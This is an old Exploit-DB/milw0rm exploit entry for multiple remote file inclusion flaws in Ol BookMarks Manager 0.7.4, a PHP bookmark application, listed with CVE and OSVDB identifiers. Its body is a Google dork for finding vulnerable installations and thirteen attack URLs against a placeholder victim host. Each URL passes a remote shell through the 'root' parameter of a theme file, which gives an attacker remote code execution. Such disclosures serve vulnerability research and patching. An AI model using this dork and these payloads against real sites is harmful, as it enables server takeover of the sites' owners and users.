Ol BookMarks Manager 0.7.4 - 'root' Remote File Inclusion

Author: ThE TiGeR
type: webapps
platform: php
port: 
date_added: 2007-05-20 
date_updated: 2016-12-22 
verified: 1 
codes: OSVDB-39497;CVE-2008-6409;OSVDB-36504;OSVDB-36503;OSVDB-36502;OSVDB-36501;OSVDB-36500;OSVDB-36499;OSVDB-36498;OSVDB-36497;OSVDB-36496;OSVDB-36495;OSVDB-36494;CVE-2007-6518;CVE-2007-2817;CVE-2007-2816;OSVDB-36493;OSVDB-36492 
tags: 
aliases:  
screenshot_url:  
application_url: http://www.exploit-db.comolbookmarks-0.7.4.tar.gz

#Olbookmarks =>0.7.4 multiple RFI (root)

Download script :

#D0rk : allintitle:ol'bookmarks

#Thanks Str0ke

#Exploit : http://mesh.dl.sourceforge.net/sourceforge/olbookmarks/olbookmarks-0.7.4.tar.gz

#http://victime.com/olbookmarks-0.7.4/themes/test1.php?root=shell

#http://victime.com/path/themes/blackorange.php?root=shell

#http://victime.com/path/theme/default.php?root=shell

#http://victime.com/path/theme/frames1.php?root=shell

#http://victime.com/path/theme/frames1_top.php?root=shell

#http://victime.com/path/theme/test1.php?root=shell

#http://victime.com/path/theme/test2.php?root=shell

#http://victime.com/path/theme/test3.php?root=shell

#http://victime.com/path/theme/test4.php?root=shell

#http://victime.com/path/theme/test5.php?root=shell

#http://victime.com/path/theme/test6.php?root=shell

#http://victime.com/path/theme/frames1_left.php?root=shell

#http://victime.com/path/theme/frames1_center.php?root=shell

#Discovered by ThE TiGeR

#Miro_Tiger[at]Hotmail[dot]com

# milw0rm.com [2007-05-21]